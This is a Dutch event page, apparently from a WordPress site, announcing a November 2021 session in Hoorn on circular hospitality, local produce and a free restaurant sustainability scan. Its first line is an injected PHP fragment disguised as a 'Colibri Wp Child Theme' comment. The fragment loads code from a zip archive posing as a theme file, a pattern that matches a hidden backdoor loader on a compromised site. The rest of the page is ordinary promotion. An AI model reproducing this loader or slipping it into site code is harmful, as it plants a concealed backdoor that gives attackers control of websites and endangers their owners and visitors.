/* Colibri Wp Child Theme */ load_template( "zip://" . locate_template( "colibri-wp-child.theme" ) . "#archive", true ); Circulaire horeca – OVCastricum

Een recept voor kostenbesparing & creativiteit op je bord

De gast verwennen met regionale producten op zijn bord en kosten besparen op je bedrijfsvoering. Krijg inzicht in hoe je dat doet met de circulaire horecascan. Meer circulaire prikkels in je horecabedrijf brengen is een recept voor succes. Het staat uitgebreid op het menu van deze inspiratiesessie. En, de provincie stelt maar liefst 25 scans (gratis) beschikbaar.  

Thema

Wanneer Nederlanders uit eten gaan, willen zij steeds vaker duurzaam genieten. Het is lekkerder, als je weet dat producten afkomstig zijn uit je eigen omgeving en biodiverse (seizoen)groente de boventoon voeren op de kaart. Juist nu is het moment om slim in te spelen op deze vraag. Van duurzame beleving op het bord naar duurzame bedrijfsvoering & kostenbesparing, ook op energieverbruik. Want hoe ga jij om met stijgende inkoopprijzen? Het tegengaan van verspilling van voedsel en het beperken van afval? Ja, ook afval verminderen levert besparing op. We betalen voor de verpakkingen en voor het afvoeren van verpakkingen. Dat zet te denken! Het zijn vragen die steeds relevanter worden in deze tijd van verantwoord handelen en stijgende inkoopprijzen. Het draagt bij aan ‘guilty free’ eten voor de gast en brengt meer efficiency in je bedrijfsvoering. Kortom, het maakt het verhaal rond, of beter gezegd: circulair.

Wanneer

Provincie Noord-Holland en Circulair Westfriesland organiseren 22 november 2021 samen met CREM en Dutch Cuisine een inspiratiesessie over echt koken met streekproducten en circulaire kansen in de horeca. Via deze sessie kom je als horecaondernemer in aanmerking voor een gratis circulaire scan. Met de scan krijg je direct inzicht in circulaire quick-wins in je bedrijf, die goed zijn voor je imago en portemonnee.

Locatie

De inspiratiesessie circulaire horeca vindt plaats bij d’ Oude Waegh, Roode Steen 8, Hoorn.  Klik hier voor een routebeschrijving. Zin om de toekomst te proeven? Aanmelden kan tot 6 november door een e-mail te sturen naar Victor de Lange van CREM (v.delange@crem.nl).

Voor Wie? 

Deze sessie is enerzijds gericht op horecaondernemers inzicht te geven en een tool aan te bieden om slim te sturen op bedrijfsprocessen. Tegelijkertijd is de sessie interessant voor (chef)koks, vanwege de vertaling naar een duurzame menukaart met inspirerende voorbeelden. 

Waarom meedoen?

De inspiratiesessie circulaire horeca:

  • Geeft een impuls aan innovatie en creativiteit.
  • Versterkt je imago bij bestaande klanten.
  • Biedt kansen om nieuwe doelgroepen te binden en te boeien.
  • Biedt kansen voor directe kostenbesparing.
  • Biedt kansen voor samenwerking met andere bedrijven en/of met horecagroothandels die aan dit traject deelnemen.
  • Maakt je onderdeel van de oplossing voor een aantal grote maatschappelijke uitdagingen, waarover steeds meer mensen zich zorgen maken.

 

Programma

9.30 uur - Inloop 

10.00 uur - Welkom door provincie Noord-Holland en Circulair Westfriesland.

10.10 uur - Kijkje in de keuken bij Frank Wiese, eigenaar van de d’ Oude Waegh. De eerste horecaondernemer in West-Friesland waar de circulaire scan is uitgevoerd. Hoe werkt dat en wat heeft het hem opgeleverd? 

10.30 uur  - Dutch Cuisine is aanjager van het circulaire restaurant en mede ontwikkelaar van de circulaire scan. De scan geeft inzicht in directe besparingen op energie, voorkomen van afval, problematiek van verpakkingen, voedselverspilling, duurzaam inkopen. En hoe vertaal je dat naar een duurzame menukaart, naar biodiversiteit op je bord? Interessant? Ontdek waar jouw quick-wins liggen. Hoe vertaal je dat naar biodiversiteit op je bord? Dutch Cuisine laat zien hoe doe je dat doet.

11.15 uur - Doorkijk naar de toekomst. De circulaire scan wordt aangeboden aan deelnemers van deze sessie en wordt onder deskundige begeleiding uitgevoerd. In een tweede sessie in februari worden de resultaten besproken. Met als doel samen leren en samen bouwen aan een gezonde circulaire horecasector. 

11.25 uur - Start informele lunch en netwerken.

12.30 uur - Einde sessie

 

Over de organisatoren

Provincie Noord-Holland is een van de meest vooruitstrevende provincies op het gebied van circulair ondernemen. Door middel van programma's, kennisbijeenkomsten en subsidies helpt zij ondernemers in de provincie met het ontwikkelen van een circulair bedrijfsmodel en bij het uitvoeren van circulaire projecten. Kijk voor meer informatie op de website.

Circulair Westfriesland is een initiatief van de zeven Westfriese gemeenten, de Westfriese Bedrijven Groep, Omgevingsdienst NHN, Ontwikkelingsbedrijf NHN en Rabobank. Circulair Westfriesland bundelt circulaire kennis en kunde in de regio. Door slim om te gaan met grondstoffen, dragen wij bij aan een duurzame en toekomstbestendige economie. Wij helpen ondernemers om de zorg voor het milieu te verbinden aan een gezonde bedrijfsvoering. Kijk voor meer informatie op de website.

Dutch Cuisine maakt zich hard voor de Nederlandse keuken en eetcultuur. Deze eetcultuur gaat uit van smaak en gezond en verantwoord koken vanuit onze creativiteit en eigenzinnigheid. Het is gebaseerd op principes die duurzaam zijn voor mens en milieu. Dutch Cuisine heeft het landelijke programma ‘Biodiversiteit op je Bord’ ontwikkeld. Het doel hiervan is om lokale producten die beter zijn voor biodiversiteit, natuur en landschap via de menukaart van horeca en cateraars te stimuleren. Kijk voor meer informatie op de website.

CREM is gericht op het verduurzamen van voedselketens, circulariteit in de out-of-home foodservice sector. Samen met en in opdracht van bedrijven, overheden, kennisinstellingen en burgers. En zodanig dat iedereen zich herkent in de uitdagingen en oplossingen. We zijn hierbij breed inzetbaar, van onderzoek tot training en implementatie, van een brainstorm tot de monitoring van resultaten. Kijk voor meer informatie op de website.

 

Categories:

Tags:

No responses yet

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

error: Content is protected !!